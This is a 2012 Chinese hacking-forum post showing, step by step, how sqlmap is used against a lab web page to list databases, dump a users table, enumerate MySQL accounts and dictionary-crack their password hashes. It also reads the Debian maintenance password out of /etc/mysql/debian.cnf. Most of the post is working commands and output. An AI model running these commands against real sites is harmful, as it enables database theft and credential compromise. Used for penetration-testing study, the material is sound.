切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
271 SQLMAP 3 获得数据[复制链接]
发表于 2012-9-13 23:39:39 | 显示全部楼层 |!read_mode!
获得数据库
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --dbs
  2. [21:17:47] [INFO] fetching database names
  3. available databases [3]:
  4. [*] information_schema
  5. [*] mysql
  6. [*] pentest
复制代码
指定数据获得表

可以看出有3个数据库 制定pentest

  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" -D pentest --tables
  2. [21:18:38] [INFO] fetching tables for database: 'pentest'
  3. Database: pentest
  4. [2 tables]
  5. +-------+
  6. | stuff |
  7. | users |
  8. +-------+
复制代码
获得columns有两个字段 获得USERS的columns
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" -D pentest -T users --columns
  2. Database: pentest
  3. Table: users
  4. [3 columns]
  5. +----------+---------------------------+
  6. | Column   | Type                      |
  7. +----------+---------------------------+
  8. | id       | int(10) unsigned zerofill |
  9. | password | varchar(45)               |
  10. | username | varchar(45)               |
  11. +----------+---------------------------+
复制代码
获得内容
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" -D pentest -T users -C id,password,username --dump
  2. Database: pentest
  3. Table: users
  4. [2 entries]
  5. +------------+----------+----------+
  6. | id         | username | password |
  7. +------------+----------+----------+
  8. | 0000000000 | admin    | admin    |
  9. | 0000000001 | guest    | guest    |
  10. +------------+----------+----------+
复制代码
获得MYSQL用户
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --users
  2. [21:22:09] [INFO] fetching database users
  3. database management system users [108]:
  4. [*] 'debian-sys-maint'@'localhost'
  5. [*] 'root'@'127.0.0.1'
  6. [*] 'root'@'localhost'
  7. [*] 'root'@'ubuntu'
复制代码
  1. 第一个是UBUNTU系统默认的 debian-sys-maint中Debian系统对MySQL维护用的,可以理解为通过系统的某个“非常规”程序对Mysql进行备份恢复等行为时,改程序所使用的登录Mysql的账户。
  2. 这个debian-sys-maint用户只有Debian或Ubuntu服务器才有,所以如果您的服务器是Debain或 Ubuntu,debian-sys-maint是个Mysql安装之后自带的用户,具体作用是重启及运行mysql服务,不过这个用户也有一个安全问题 就是他的权限和ROOT是一样的,并且密码可以在/etc某个文件中找到,这就要对这个账户进行一些限制了。
复制代码
  1. root@ubuntu:/# cat /etc/mysql/debian.cnf
  2. # Automatically generated for Debian scripts. DO NOT TOUCH!
  3. [client]
  4. host     = localhost
  5. user     = debian-sys-maint
  6. password = NKjpIxCOU2bJymz7
  7. socket   = /var/run/mysqld/mysqld.sock
  8. [mysql_upgrade]
  9. host     = localhost
  10. user     = debian-sys-maint
  11. password = NKjpIxCOU2bJymz7
  12. socket   = /var/run/mysqld/mysqld.sock
  13. basedir  = /usr
  14. root@ubuntu:/#
复制代码
获得用户密文
  1. root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --passwords

  2. do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y  <strong>#是否自动破解密文</strong>
  3. [21:28:21] [INFO] using hash method 'mysql_passwd'
  4. what dictionary do you want to use?
  5. [1] default dictionary file '/pen/sql/sqlmap/txt/wordlist.zip' (press Enter)   <strong>#选择字典</strong>
  6. [2] custom dictionary file
  7. [3] file with list of dictionary files
  8. > 1
  9. [21:28:24] [INFO] using default dictionary
  10. do you want to use common password suffixes? (slow!) [y/N] y
  11. [21:28:26] [INFO] starting dictionary-based cracking (mysql_passwd)
  12. [21:28:27] [INFO] cracked password '123456' for user 'root'                                                                 
  13. [21:28:40] [INFO] current status: sj860... \^C
  14. [21:28:40] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)
  15. [21:28:40] [INFO] writing uncracked hashes to file '/tmp/tmpiTxL5z.txt' for eventual further processing                     
  16. database management system users password hashes:
  17. [*] debian-sys-maint [1]:
  18.     password hash: *F18C8FC7AA96F303EC2A90C61A1A9AE83225E034
  19. [*] root [1]:
  20.     password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
  21.     clear-text password: 123456    <strong>#破解结果</strong>

  22. [21:28:40] [INFO] fetched data logged to text files under '/pen/sql/sqlmap/output/5.5.5.8'

  23. [*] shutting down at 21:28:40

  24. root@Dis9Team:~#
复制代码
详细信息-v 1到10
root@Dis9Team:~# sqlmap -u “http://5.5.5.8/pen/news.php?id=1″ –users -v10




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-1 19:40

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部